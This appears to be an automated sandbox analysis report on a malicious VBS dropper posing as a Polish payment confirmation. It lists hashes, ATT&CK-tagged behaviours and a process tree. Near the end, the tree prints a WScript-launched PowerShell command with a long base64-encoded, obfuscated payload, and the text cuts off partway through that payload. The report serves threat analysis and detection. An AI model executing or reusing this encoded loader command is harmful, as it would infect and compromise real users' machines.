261fd97d96d213ebbb0add61ced1a5e913389078a52d4bd1036203f16cd11981

General

Target

potwierdzenie wpłaty-021784.vbs
Size

188KB
MD5

68551303b71795b507434b77679f5796
SHA1

c198cb2cc41fbb62e3993bbff7d5931403cab2ed
SHA256

261fd97d96d213ebbb0add61ced1a5e913389078a52d4bd1036203f16cd11981
SHA512

a33cbdb1d9a62b5f00634bf1e974fc209d01ac0bb8a21a9cafaedc867975d4681e1bf7c4a7edba8c16c67fb334e0116cb3d58ef9b760339307f527f434a7c660
SSDEEP

3072:FyBpnpcufxKYM6++ct//47uJQ+xNIga/v5GycoOEPQfevM8K4Ec5C+O8:FCn3ZKEi//WuJlIga/hGycoOEPSe3EcF

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	4684	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4884	powershell.exe
4884	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4884	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 4684 wrote to memory of 4884	4684	WScript.exe	80
PID 4684 wrote to memory of 4884	4684	WScript.exe	80
PID 4684 wrote to memory of 4884	4684	WScript.exe	80
PID 4884 wrote to memory of 1972	4884	powershell.exe	85
PID 4884 wrote to memory of 1972	4884	powershell.exe	85
PID 4884 wrote to memory of 1972	4884	powershell.exe	85
PID 1972 wrote to memory of 2112	1972	csc.exe	86
PID 1972 wrote to memory of 2112	1972	csc.exe	86
PID 1972 wrote to memory of 2112	1972	csc.exe	86

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\potwierdzenie wpłaty-021784.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4684
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -e "JABTAGUAcgB2AGkAdAB1AHQAIAA9ACAAQAAnAA0ACgBOAGkAYwBoAGUAQQBiAGkAYQBuAG4AZABPAHgAYQBsAHUAZABPAG0AcwB0AGkALQBDAGkAYwBhAHQAVABkAGUAbAB0AGEAeQBNAGUAZABwAGwAcABFAHgAcABsAGEAZQBTAHIAawBlAG4AIABCAGEAdwBsAGUALQBUAGUAbABlAGcAVABMAGUAdgBlAGwAeQBVAGUAZwBlAG4AcABCAHUAcgBnAGUAZQBBAGYAcwBrAGkARABOAGEAdAByAG8AZQBIAHkAbQBlAG4AZgBCAGUAZwBuAGkAaQBEAGUAYwBvAG4AbgBWAGkAZABlAG8AaQBCAGwAYQBzAHQAdABFAG4AZQB0AGkAaQBLAHIAeQBkAHMAbwBUAHIAdgBlAHMAbgBIAHkAcABvAHAAIABDAGgAYQB3AHMAQABPAHYAdQBsAGEAIgAKAFQAaAB1AHIAbgB1AEEAcgBtAGEAZwBzAFUAcgBvAGcAcgBpAFYAaQBuAGQAcgBuAEYAaQByAHMAawBnAFMAdABhAHIAdAAgAEkAbgBnAHIAZQBTAFUAbgBkAGUAcgB5AEwAZQB0AG8AIABzAEYAbwBuAHQAYQB0AEIAdQBuAGoAYQBlAE0AbwBuAGkAdABtAEcAYQBkAGEAcgA7AAoAQgBvAHUAZwBhAHUAVAByAGEAbgBzAHMAQgBsAHUAZABnAGkAQQBuAGEAZwBsAG4AVgBhAG4AZAByAGcAVgBlAGQAaABmACAAQQB1AHQAbwBzAFMARgBvAHIAZQB5AHkARwByAGEAbQBtAHMASwBsAG8AcwBlAHQAQwBhAHIAbgBlAGUATQBhAGcAbgBlAG0AVAByAGEAZwBpAC4ARwB1AHQAdAB1AFIAbABlAGkAcwB0AHUARQBwAGUAbgBkAG4ARQBsAHUAcwBvAHQASgBhAG0AYQBpAGkAVgBhAHIAbQBlAG0ARgBvAHIAbABvAGUAQwBpAHIAawBlAC4AbABvAGMAdQBzAEkAVQBuAHEAdQBhAG4ASQBvAGQAYQB0AHQASQBuAGQAdgB1AGUAUwBrAHkAbABkAHIAUgBvAG0AZQBzAG8ARABpAHMAcwBpAHAARgBvAHIAcwBrAFMATQBhAHoAbwBwAGUARgBvAHUAcwBzAHIAVAB5AGwAbABlAHYARABvAG0AaQBjAGkARgBvAHIAbABvAGMAQwBvAHQAcwAgAGUAaABvAHYAZQBkAHMAQwBvAGEAdABpADsACgBEAGkAcwBlAHMAcABIAHIAaQBuAGcAdQBQAGEAbgBkAGUAYgBPAHYAZQByAHMAbABBAHQAcgBpAHUAaQBUAHUAcgBpAHMAYwBTAG4AawBzAG0AIABBAHIAZwBpAG8AcwBGAG8AcgBuAHkAdABGAHIAYQB0AGUAYQBQAHQAbwBjAGgAdABUAHkAcgBhAG4AaQBIAHkAZAByAG8AYwBQAHIAZQBwAGEAIABHAHIAZQBuAG0AYwBDAGEAdABhAG0AbABLAGwAbwBvAGYAYQBKAHUAcwB0AGkAcwBPAHYAZQByAGcAcwBBAGEAbABiAGUAIABEAGEAZgBuAGkASwBEAGkAYQBzAHQAcgBCAGUAcgBuAGEAeQBQAHIAYQBjAHQAbQBGAG8AcgBzAGkAcABWAGEAcgBlAGwAZQBDAG8AYgBzAHQAcwBVAGsAcgBhAGkAYwBEAGUAYwBlAG4AMQAKAEsAbgBpAGMAawB7AEQAbwBsAGsAZQBbAEYAdQByAGkAbABEAEEAZAB2AG8AawBsAEkAbgBzAGUAbQBsAEYAbwB3AGsAIABJAFYAaQBoAGEAcgBtAFQAbQByAGUAcgBwAEQAZQB5ACAAQQBvAEcAZQBuAG8AcAByAEcAZQBuAHQAbAB0AFMAdgBpAGQAbgAoAEYAbwByAGUAcwAiAEwAYQBuAGQAcwBrAFIAdQBsAGwAZQBlAEIAcgBlAG4AdAByAFIAZQBjAG8AbgBuAEwAaQBiAHIAYQBlAFAAcgBvAGcAcgBsAEkAbQBiAGEAcgAzAHAAcgBvAHQAbwAyAHQAZQBjAHUAbgAiAE4AbwBuAGMAbwApAEsAdQBsAHQAdQBdAEQAbwB1AHMAZQBwAFAAZQByAGkAbQB1AFMAdQByAG0AbwBiAFAAZQByAGkAawBsAFQAdQByAGMAeQBpAE0AaQBkAHkAZQBjAEkAbgBlAHgAdAAgAEEAYQByAGUAbQBzAEIAYQBnAGEAdAB0AEwAbwB2AHMAYQBhAFMAeQBtAHAAdAB0AFUAbgBrAGUAbgBpAE0AYQB0AHIAaQBjAEIAZQBhAHIAYgAgAFYAZQBuAGUAYwBlAE8AbgBkAHMAawB4AFMAZQBsAGYAIAB0AFMAcABpAHYAcwBlAEQAaQBtAGUAbgByAEEAbgB0AGkAaABuAFAAZQBhAHMAZQAgAEEAbgB0AGEAZwBpAFQAcgBlAGUAdABuAFMAYQBkACAAVwB0AFMAYwBoAGEAYQAgAFAAZQBpAG4AaQBHAFUAbgBkAGUAcgBlAFUAbgBuAGUAaQB0AHMAdQBwAGkAbgBTAFcAYQBwAGEAdAB5AEEAYwBlAHQAYQBzAEEAawB1AHQAYQB0AEUAbgBnAHIAbwBlAFMAdABpAGcAbQBtAEYAbwByAHUAcgBEAFUAZAB2AGkAawBpAEkAbgBzAHUAcgByAE8AdgBlAHIAaABlAE0AYQBsAGEAeABjAEkAbgBkAGUAawB0AFQAcgBlAGQAaQBvAEYAbwByAHUAbAByAEgAYQB1AGwAYQB5AE0AaQBzAHMAaQAoAFMAaQBuAGEAIABpAE0AZQBuAGkAbgBuAEYAbAB1AHAAaAB0AEgAdQBkAGcAZQAgAEEAYgBzAHUAbQBTAEMAbwBwAGUAcwBhAEgAZQB4AGEAZABtAEYAbwByAHIAZQBtAFMAdABvAHAAZgAsAEwAYQB0AGkAZgBpAEIAZQBuAGUAcwBuAFMAdABlAG0AbgB0AFMAeQBuAGUAYwAgAEsAdQBnAGUAbABwAGgAdgBhAGwAZQBoAE4AcgBnAGEAYQBvAGwAYQBrAG0AdQByAEsAbwBtAHAAcgBvAFcAaABpAHAAcwApAHAAZQByAGkAbgA7AAoASwBhAGsAYQBwAFsATQBlAHIAYwBhAEQAUwB0AGkAbABzAGwARgBvAHIAbQBhAGwAVQBuAGMAaQByAEkAUwB0AG8AcgBrAG0ARgBvAHIAZwBhAHAAQgByAGEAYgBhAG8ARQBzAHQAdQBhAHIAQQBpAHIAZQBkAHQAQwBoAG8AcgB1ACgARABlAHMAaQBnACIAVgBpAHQAcgBpAHUAVwBvAHIAawBiAHMAQQB3AGEAYgBhAGUATwBtAGIAbABnAHIASwBvAGUAawBrADMAQgBvAGwAaQBnADIAUAB1AG4AaQB0ACIAUwBpAG4AdQBzACkAUwB1AGIAZQByAF0AUwBhAHIAYwBvAHAAVABlAGwAZQBmAHUAUAB1AG4AZwB5AGIAQQByAGsAaQB0AGwAVQByAGUAbgBoAGkAUABlAHIAZgBvAGMARwBvAHcAbgAgACAATABlAG4AaQBuAHMATQBlAGkAbgBpAHQAWQBhAHcAbgAgAGEAUwBuAGsAZQAgAHQARQBsAHMAawBlAGkAUwB0AGUAaQByAGMAdABvAHIAYwBoACAAUABsAGUAdABoAGUAQwBpAHYAaQBsAHgAVAByAHMAawBlAHQAVgBpAGQAdQBuAGUATQBvAGQAaQBzAHIATwBwAHIAZQBnAG4AQgBvAG8AaAAgACAAUgBlAGYAcgBvAGkARABlAG0AbwBjAG4AUwBoAGEAdwB5AHQARABlAHQAZQByACAATQBlAG4AaQBuAFMASQBzAG8AcQB1AGUARABpAHAAbABvAHQAUwBhAGkAZABzAFMASwBsAGEAcwBzAGMASwBhAHAAZQBsAHIAUwBwAGgAeQBnAG8ARABlAGMAYQByAGwAUwB5AGwAdABlAGwATABhAGMAawBlAFIAaABhAGwAaQB0AGEATwB2AGUAcgBhAG4AZgByAGkAcwBlAGcAaAB5AHAAbwBwAGUATQBpAG0AaQByACgAVABvAG0AZwBhAGkASAB3AHkAIABEAG4AUwBwAG8AbABlAHQARABhAGwAcwB0ACAAQQBkAGoAdQBnAE8AUABhAHIAYQBmAHAAQgBsAG8AZABzAHIARABhAG4AYwBlAHkAQQBuAGUAbQBvAGQAUwB5AGcAZQBsAG4AUABoAGEAcwBvACwATABpAGwAbABpAGkAUAByAG8AYwBlAG4AUgBlAHMAZQBhAHQASwByAHkAcAB0ACAAUAByAGUAYwBvAFMARABhAG4AbgBlAHkATQBpAGMAcgBvAG0AQQBsAHUAbQBpACwARgBvAHIAZQBiAGkASwBvAGwAZABmAG4ASwB1AGwAZQAgAHQAUABpAGcAcwB3ACAAUABpAGIAbABvAEUARgBpAHMAYwBhAGwAQwBlAHMAcwBpAGcAZgBsAG8AcwBzAGUAUAByAGUAcgBlAHAAUwBrAHIAYQBsAGEATQBpAHUAcgB1ACwAYwBoAHUAdABuAGkAVQBkAGsAYQBzAG4AVwBhAHQAdQBzAHQAVABlAHIAcgBpACAARgBvAHIAaABhAFYAcwBiAGUAZgBhAGkAcABoAG8AdABvAGMAVwBoAGEAbABwACwAQgBhAGcAcwB0AGkAZQBsAGUAYwB0AG4AQQB2AGkAYQB0AHQASwBhAGIAZQBsACAAUwBsAGkAZABmAEYAUwB1AHIAcgBvAGwAQQBiAGEAbgBkAGEAUgBlAGcAaQB0ACkARAByAG8AbABsADsACgBGAGEAYgByAGkAWwBWAGkAdgBpAHMARABNAGkAYwByAG8AbABTAGMAaABpAHoAbABzAHQAYQBuAGQASQBCAGUAaABuAGQAbQBGAG8AbwB0AGgAcABUAG8AbgBpAGMAbwBmAGkAYQBjAHIAcgBPAHAAcwBsAHUAdABFAG4AdABhAG4AKABEAHUAcwBpAG4AIgBXAGgAYQBuAGcAawBmAGEAbgBnAHMAZQBZAGQAZQByAHYAcgBDAG8AcwBtAG8AbgBPAHIAcABpAG4AZQBOAG8AdwBoAGEAbABBAG4AeQBvAG4AMwBBAGYAcABvAGwAMgBCAGUAdABhAGkAIgBIAGUAYQB0AHIAKQBIAHUAbgBkAGUAXQBFAGwAZQBjAHQAcABTAHUAYgBqAGUAdQBCAGwAbwBrAHAAYgBDAGgAYQBuAGUAbABBAGwAbABlAHIAaQBLAGkAbABsAGkAYwBCAHIAZQBkAGwAIABCAHIAaQBnAGgAcwBKAG8AcwB0AGkAdABhAG0AcABoAGkAYQBiAHUAbABsAHcAdABJAG4AdABhAGcAaQBKAGEAbQBiAG8AYwBMAG8AbABpAGcAIABQAGwAZQBiAGUAZQBBAGYAdABvAHAAeABDAGEAcgBtAGkAdABGAGkAbgBnAGUAZQBVAG4AdwByAGkAcgBNAGkAcwBwAGEAbgBQAHIAZQBmAG8AIABLAGUAeQBlAGQAaQBMAHUAZgB0AGYAbgBTAGMAbwByAHoAdABSAG8AbABsAG8AIABTAHYAbQBtAGUAVgBNAG8AbgB1AG0AaQBGAGUAcgBpAGUAcgBwAHUAbgBkAGUAdABJAHMAdgBhAGYAdQBNAGkAcwBjAG8AYQBEAHkAbgBhAG0AbABmAGEAcgB2AGUAQQBBAG4AdABpAGMAbABTAGkAcwBrAGEAbABTAGMAbwB0AHQAbwBUAHYAcgByAGUAYwBPAHYAZQByAHQAKABBAHIAYwBoAHAAaQBBAHIAdQBzAHAAbgBPAHAAawByAHYAdABDAGgAcgBvAG0AIABHAHIAYQBmAGkAdgBUAGkAZABpAGcAMQBGAGkAbgBhAG4ALABLAG4AYQBpAGQAaQBiAHUAbQBtAGUAbgBCAG8AbABpAGcAdABBAG4AbgBhAGwAIABFAGsAcwBwAGUAdgBTAHAAYQBkAGEAMgBNAGkAcgByAG8ALABQAGwAZQBuAGUAaQBTAHYAaQBuAGUAbgBBAGkAcgBiAHUAdABTAHQAYQBkACAAIABSAGgAYQBiAGQAdgBpAG0AcABhAHMAMwBOAGEAdAB1AHIALABVAG4AYQBmAHIAaQBCAGwAawBzAHAAbgBDAGkAbgBlAHIAdABQAGwAYQBnAGUAIABSAGUAZgBlAHIAdgBCAHIAaQBsAGwANABNAHUAcgBhAG4AKQBVAG4AcgBlAGMAOwAKAFMAZQByAHYAaQBbAEMAaABlAGYAcABEAFYAbwBsAHQAbQBsAEoAZQB3AGUAbABsAE4AcwBrAGUAbABJAEMAYQBtAG8AdQBtAGcAbABpAG0AcABwAEMAdQB0AG8AYwBvAFIAZQBlAGsAcwByAEUAdQBjAGgAYQB0AFAAYQByAGEAcwAoAEMAbwBsAHUAbQAiAFMAdAByAGEAYQBrAFIAZAB0AGoAcgBlAFAAdQBrAGwAZQByAEgAZQB0AGUAcgBuAFUAbgB3AGEAcgBlAE8AYwBlAGwAbABsAFUAbgBkAGUAcgAzAFQAcgBhAGQAaQAyAFMAaQBsAHUAcgAiAFMAbwBsAG8AZQApAFMAdQBwAHAAbABdAFIAZQBjAGgAYQBwAEEAawB0AGkAdgB1AFQAZQBuAG4AaQBiAEMAbwByAHIAZQBsAGMAbwBzAG0AbwBpAFUAZAB0AHIAawBjAE4AcwBrAGUAdAAgAE4AbwBuAHQAZQBzAEYAbgBnAHMAbAB0AFUAZAByAHUAbABhAFQAZQBnAG4AcwB0AEgAeQBkAHIAYQBpAFQAdQBuAGcAZQBjAFQAaABvAHIAdQAgAHAAcgBvAHYAZQBlAFMAdQBiAGwAaQB4AEwAYQBjAGUAYgB0AEYAaQBzAHQAdQBlAFMAaQBsAGQAZQByAEYAcgBpAGsAdABuAG0AaQBzAHMAcAAgAEgAeQBwAGUAcgBpAFMAdAByAGEAbQBuAEYAZQBtAHQAbwB0AFMAbwBjAGkAYQAgAEcAaQBmAGwAZQBHAFUAZAB2AGkAcwBlAFAAaQBuAGcAIAB0AFMAdABvAGsAZQBMAEIAagBlAHIAZwBvAEQAcgBrAGkAawBjAEIAdQBsAGwAaQBhAFAAcgBlAHMAcwBsAEMAZQBsAGkAbgBlAEIAbABvAGQAcwBJAGsAdQBuAGQAZQBuAFMAawBpAGwAcwBmAFMAaQBlAHMAdABvAFMAdQBwAGUAcgAoAEQAbwByAGEAZABpAEgAbwBuAG4AcgBuAFMAcAByAGkAbgB0AEgAdQBuAGcAZQAgAEgAYQB5AGUAeQBDAEoAZQByAGIAaQBhAE0AbwBzAHQAYQBzAEYAYQBrAHUAbAB0AEIAZQBrAG8AcwBvAE8AcgBkAGUAbgAsAEQAYQB0AGEAbABpAEYAbwByAGcAcgBuAEwAaQBzAHMAZQB0AFMAZQBzAG0AYQAgAEYAbABlAHIAaQBDAFYAaQB0AGEAbQBoAEUAbgBkAG8AcwBlAGsAYQBmAGYAZQBlAEQAcgBpAGwAbAAsAEIAbABhAGEAcwBpAEMAcgB5AHAAdABuAEMAYQByAGMAYQB0AFAAcgBlAGEAbgAgAEUAcABoAGEAcwBBAFIAaQBjAG8AbABzAEkAbQBwAHIAbwBjAFMAcABlAGoAbABvAFUAbgBpAG8AbgByAFMAdABvAHAAdQAsAEkAbgB0AGUAYgBpAEQAYQB0AGEAbQBuAFIAZQB2AG8AbAB0AFMAdQBsAHAAaAAgAFMAZQBuAGEAdABMAG0AZQBzAGsAYQBlAGEAbAB1AG0AbgBlAFUAZABsAGkAZwBmAEMAbwBuAGMAYQB1AFMAdAB5AHIAZQBsAGIAZQBzAHQAZQApAE8AZgBmAHMAYwA7AAoARgBsAGUAeABpAFsAQQByAHIAYQBzAEQARABlAG4AZQB6AGwAUwB0AGUAcgBpAGwAQgBhAHQAaQBkAEkAUgB1AHQAaQBuAG0AQQBrAGsAcgBlAHAAbwByAHQAYQBsAG8AQQBuAGkAcwBvAHIATABlAG4AdABpAHQAYwBvAG4AaQBuACgARgBlAG4AZQBzACIAUwBhAG4AcABvAHcAVQBuAGQAZQByAGkAQwBpAGcAYQByAG4AQgBlAGUAbgBuAHMATgBpAHQAbgBpAHAATgBvAG4AdAByAG8AUwBtAHUAZABzAG8ARgBvAHIAbQB1AGwASwB1AGYAZgBpAC4AYwBvAHUAbgB0AGQAQgBpAGIAbABpAHIAbQBvAG8AbgBzAHYATABlAG4AYQBlACIAUwBtAG8AdABoACkAYgBsAGEAYwBrAF0AVABpAGwAYgB5AHAATQBvAG4AbwByAHUAUgBlAGcAbgBtAGIAUwBuAHkAZABlAGwATABhAGMAZQB3AGkATgBlAGcAcgBpAGMAdQBuAG0AYQBnACAATgBlAHUAcgBvAHMAVAByAG8AcwBzAHQAUwB0AGkAcgByAGEAUABhAHMAcwBhAHQARgBvAGQAcwBrAGkARwBhAHIAZABlAGMASQBuAHQAZQBtACAAQgBvAHkAbABlAGUAYgBlAG4AdABoAHgAQQBmAHYAaQBrAHQAaQBzAG8AbQB5AGUARQBuAGgAZQBkAHIASAB5AGQAcgBvAG4ATgBlAGcAcgBlACAAUwBpAHMAawBlAGkARABpAHMAcAByAG4AQQBkAG0AaQBuAHQAQQByAGsAaQB0ACAATwBwAGUAcgBhAEUASwBvAG4AcwB0AG4AVABhAGsAdABzAHUARwByAG4AcwBlAG0ATABpAHAAbwBsAEYAUAByAG8AcABvAG8AUAByAHkAcwBlAHIAVQBiAGUAcwB2AG0AcwBhAG0AcABoAHMATABhAHkAbwB1ACgAUwB3AG8AcgBkAGkAbwBwAGsAYQBzAG4ARABpAHMAYQByAHQATABvAGUAdgBlACAAVQBuAGQAaQBzAGEAVQByAGYAaQByAG4AZQBuAGcAcgBhAGsAVAByAGkAYwBrAGUAUwBrAG4AZABlAHIASQByAHIAZQBhAGYASQBsAGQAcwBwACwAUABsAGEAdABvAGkAbwBwAGcAYQB2AG4AUwB5AHMAcwBlAHQAbwByAGQAaQBuACAATQBhAGEAbABlAFIAUgBlAGQAZQB2AGUAUwBhAG0AbQBlAGgASQBuAHMAcABpAGsATgBvAG4AYQBkAGEAQgBpAGwAbABlAHMAVABhAGwAZQBiADQAUwBvAGEAcgBhADYAUgBlAHQAZQBjACwAbwByAHQAaABvAGkAUwBuAGEAawBrAG4AQQBwAHAAZQByAHQAVABoAHIAaQBmACAAcwBhAG0AbQBlAFIAYwBpAGEAcwAgAGUASwBuAGUAZQBjAGMAVQBuAGwAaQBrACwATAB5AGQAZQBuAGkAVQBuAHQAcgBpAG4ATgBpAHQAaQBkAHQAQwBvAG4AZgBvACAAVABvAHgAbwBzAEIAQwBoAGUAYwBrAGkAUwB1AHAAcABsAGwAVAB0AGgAZQBkAGUAQwBvAGwAbAB1AHYAVABlAGUAdABoAGUAVQBuAGQAZQByACwAUwBlAG0AaQBzAGkAVABhAGwAbwByAG4ASABlAG0AaQBoAHQATgBpAGMAawB5ACAARgBvAHIAZQBuAEQARgBhAGIAcgBpAGEATQBhAHIAbQBvAHQAQgBlAHMAawBqACwARgBvAHIAcwB0AGkAQgBsAGEAcwBmAG4AQQB0AHIAYQBtAHQASwB1AHYAZQByACAAUQB1AGkAcgBrAFMASwBlAHIAdAByAGEAdQBuAGQAZQByAGwAUwB5AG4AawBvAGwATwBmAGYAZQBuAHkAQwB5AGMAbABvACkAUgBvAG0AcABpADsACgBCAG8AbgBpACAAWwBPAHAAcgBpAG4ARABGAHIAaQBzAHQAbABvAG0AZwByAGUAbABCAGEAYwBrAHUASQBLAGEAbABrAHUAbQBCAGwAYQBhAGgAcABEAGUAawBsAGEAbwBUAHUAZABrAG8AcgBUAGEAYgB0AGEAdABMAGEAcwB0AHAAKAB1AGQAcwBhAGwAIgBBAHQAdAByAGEAawBIAGoAZQBtAHYAZQBLAGEAbQBnAGEAcgBNAGUAagBzAGwAbgBIAG8AbABvAGMAZQBTAHkAbgByAGgAbABTAGwAYQBnAHQAMwBDAGgAbABvAHIAMgBPAGQAbQBhAHIAIgBUAGkAbABzAHQAKQBVAG4AaQBuAHYAXQBLAG4AbwByAHQAcABSAGUAYgBvAGkAdQBLAHIAZQBzAHQAYgBUAGEAcwBoAGkAbABUAGgAbwByAGkAaQBhAGwAbABhAGcAYwBOAG8AcwB0AG8AIABzAHQAeQBtAHAAcwB0AHUAbgBnAGgAdABSAGEAYQBkAGYAYQBCAGEAZABlAGwAdABSAGUAZwBuAHMAaQBMAGEAbgBkAG0AYwBSAGUAZgBlAGMAIABTAG8AbABkAGEAZQBiAHIAbwB2AHQAeABCAGwAbwBkAHAAdABQAHIAbwBjAHQAZQBtAGEAdABlAHIAcgBzAHQAZQBuAGsAbgBPAHYAZQByAHQAIABSAGUAZgBvAHIAaQBTAHQAZQByAHMAbgBUAHIAZwBoAGUAdABMAGEAZQBvAHQAIABTAHQAZQBhAGQARwBzAHUAcgBtAGkAZQBGAHIAZQBtAHMAbgBBAGEAZwBlACAAZQBQAG8AcwBpAHQAcgBLAG8AbgB0AG8AYQBUAGgAYQBsAGEAdABEAGkAbQBtAGEAZQBBAGwAYQByAG0AQwBVAG4AcgBlAHYAbwBJAG4AZAB2AHYAbgBNAG8AbABsAGkAcwBJAG4AZgB1AHMAbwBCAGUAawBsAGEAbABCAGUAbgBlAGQAZQBTAHQAaQBnAGUAQwBTAG8AcgB0AGUAdABwAG8AbABpAGEAcgBEAGkAcwBwAGEAbABUAGUAbABhAGUARQBNAGkAbABqAGYAdgBCAGwAYQBlAG4AZQBNAHUAbAB0AGkAbgBCAGEAbABsAG8AdABJAGIAIABBAHoAKABWAGEAZwB0AGwAaQBVAGQAYgB5AGcAbgBGAGwAbwByAGkAdABTAHQAcgBpAG0AIABGAHIAYQBuAGsATwBQAGUAcgBjAG8AcABzAG8AYgByAGEAcABTAGUAbgBkAGUALABBAGYAYgByAGsAaQBNAGkAYwByAGEAbgBzAGsAYQB0AHQAdABJAG4AZAB0AHIAIABHAGEAbgBlAGwAQQBUAGEAZQBuAGQAawBJAG4AdAByAG8AcwBQAHIAbwBnAHIAZQBJAG4AdgBlAHMAYwBhAGwAYwBtAGUAKQBFAGYAdABlAHIAOwAKAFUAbgBpAHMAdABbAFUAYgBlAHMAbABEAEkAbQBtAG8AbABsAGIAbAB0AGUAcwBsAFAAcgBvAHAAbQBJAFMAaABlAHQAbABtAFMAaQBuAGcAdQBwAFUAbgBlAHIAcgBvAFMAawByAHUAcAByAHAAZQByAGkAbwB0AFAAYQBpAGMAawAoAEIAZQBzAHYAYQAiAFQAaQBtAGUAbAB3AEEAbQBpAGQAaQBpAEIAbABpAG4AZABuAEUAbABlAHYAZQBzAEYAbwByAGsAYQBwAEEAcABwAGUAbgBvAEQAeQBrAGsAZQBvAGYAcgBvAG4AdABsAEgAagB1AGwAYgAuAFIAZQBoAHkAZABkAE8AcgBkAGUAYQByAE4AbwBuAHMAdAB2AFAAbwBzAHQAbgAiAFkAZQBlACAAUwApAGgAdgBhACAAcABdAFIAbwBrAGUAcgBwAEIAdQByAHIAaQB1AEEAYgBpAGUAdABiAFUAZABkAGEAbgBsAG0AaQBkAGwAYQBpAGgAYQByAG0AZQBjAFAAcgBlAGUAbQAgAEYAYQByAG4AZQBzAEIAaQBsAGUAZAB0AFMAdQByAHIAbwBhAE4AZQB1AHIAbwB0AFYAZQBuAHQAaQBpAFIAZQBzAGgAaQBjAHQAbwBvACAAZgAgAG0AYQBpAG4AcABlAEcAYQBzAHAAZQB4AEQAaQBzAGIAYQB0AE8AbQBnAGoAbwBlAFMAcAB5AHAAcgByAFkAcAAgAEEAbgBuAE0AZQBsAGEAcwAgAFoAeQBtAG8AcwBpAEUAZgB0AGUAcgBuAFUAbAB0AHIAYQB0AEMAbwBtAHAAYQAgAEEAcwBzAGIAYQBXAEQAbwB0AHMAIABhAEsAYQBsAGUAeQBpAEMAcgBhAHcAbAB0AEcAdQBhAGkAYQBGAE0AdQBkAGQAbABvAGcAYQBiAGIAYQByAFQAaABhAGwAbABQAGEAYgByAGEAbgByAEEAbQBhAG4AdQBpAEcAYQByAGQAZQBuAE8AYgBkAHUAYwB0AGQAaQBmAGYAcgBlAEQAZQBiAGEAdAByAFMAbAB1AG0AbABDAEMAZQBsAGwAdQBoAGcAYQBzAG0AZQBhAE0AdQBsAHQAaQBuAFUAbgBzAGEAdABnAFMAdABhAGEAbABlAEQAZQBsAGEAZwAoAEwAYQBuAGQAcwBpAEUAbQBpAGcAcgBuAFMAYwBhAGwAbAB0AFYAYQBjAHUAdQAgAEUAcABpAHQAZQBUAEsAcgB5AHMAdAByAFAAbwBzAHQAZgBlAE0AaQBuAGQAcwAsAFMAdABpAGwAcABpAE0AbwBuAGUAeQBuAGkAbgBmAHIAYQB0AEoAZQBhAG4AcwAgAEEAcABoAGkAcwBHAE0AYQBrAHMAaQBlAEcAZQBuAGIAcgBkAE0AYQByAGMAZQBlAEoAdQBzAHQAbgByAEMAaABpAHIAbwBhAGYAbwByAGIAdQApAFUAbgBiAG8AdAA7AAoARgBsAGEAZwBzAFsATABhAGUAbQBvAEQARABpAG0AYQB0AGwAawBhAGYAZgBlAGwAQQBsAGwAdQBkAEkAQwBvAHIAcAB1AG0AUwBhAGQAZABlAHAAVAByAGUAcwB0AG8ARQBtAGkAdAB0AHIAQgBlAHYAaQBrAHQAQgBlAHYAaQBzACgAUwB1AHAAZQByACIAYQBuAHQAaQBzAHUAUABpAG4AYQB5AHMAQQBsAGIAYQBuAGUATABhAGsAZgBhAHIAUwB1AGcAZwBlADMASwByAGEAbgBzADIAUwBoAGkAawBhACIAQgBvAHMAcQB1ACkAVAByAGwAbABlAF0ARABlAG4AdABhAHAAUwBjAGgAZQBkAHUARQBuAGUAcgBnAGIATQB1AHMAagBpAGwAQgByAGsAagBlAGkAVQBuAGsAaQBuAGMAVABlAGEAawB0ACAAeABhAG4AdABoAHMAUgBpAG4AZwBuAHQARgBhAG4AdABvAGEAUwB1AHQAdABlAHQASgBlAG8AcABvAGkAYQBzAHQAcgBvAGMASQBuAHQAZQByACAASABqAHUAbABwAGUAUgBlAHQAcgBvAHgAVQBlAGcAbgBlAHQASwB1AG0AaQBzAGUARgBvAGwAawBlAHIAUwB0AGEAbQBhAG4AVQBpAG0AbwBkACAAUAB1AGwAdgBpAGkATQBhAGQAZABpAG4AUgBlAHMAdABpAHQATgBvAG4AZQB4ACAAVABtAG0AZQAgAFQAQQBuAG0AaQBzAG8AQQBuAHQAaQBjAFUAUwBwAG8AbgBnAG4AQwBpAHIAcgBoAGkAUwBoAGUAdABsAGMARgBvAHIAdAByAG8ATwBsAGwAaQBuAGQAUgBlAGsAdABvAGUAQgBhAGMAawBmACgAVABlAGEAcwBpAGkARwBuAGEAdABmAG4ASQBuAHQAZQB4AHQAUwBuAHkAbAB0ACAAQgByAGEAawBuAEgATQB1AHQAdQBzAGEASwBhAG0AZQByAGEAUwB0AGEAbQBmAG4AZABlAGsAbwBkAGQAUgBlAG4AdABlAHQAUAByAGUAZABpADUAVgBhAHIAaQBzADEAcgBlAGMAbwBnACwAUwB1AGYAZgBlAGkATQBhAHQAaQBuAG4AUgBlAHQAdQByAHQAQgB1AHQAdABlACAAVABpAHAAbwBsAFIAbAB5AGQAaQBzAGUAQgByAG8AbQBpAGQARABpAHMAaQBuAGUARgBvAHIAZQBuADIAQgBqAGUAcgBnADMARQBqAGUAcgBzADIAQQBmAGcAYQBuACwAYgByAGUAZABkAGkAVAByAHkAcABhAG4AUABsAGEAbgBtAHQAUwBsAG8AdQBjACAAQgByAGEAYwBoAEEAUwB0AHUAbQBwAGwAUQB1AGkAegBlAGwATABpAG0AbwBzAG8AQQBmAGwAcwB0AGkAUgBoAGUAbwB0ACwAUgBlAGsAeQBsAGkAcgBlAHQAaQBuAG4AVABoAGUAbwByAHQAUwBlAG0AaQBtACAAdQBuAHAAcgBhAFcAUw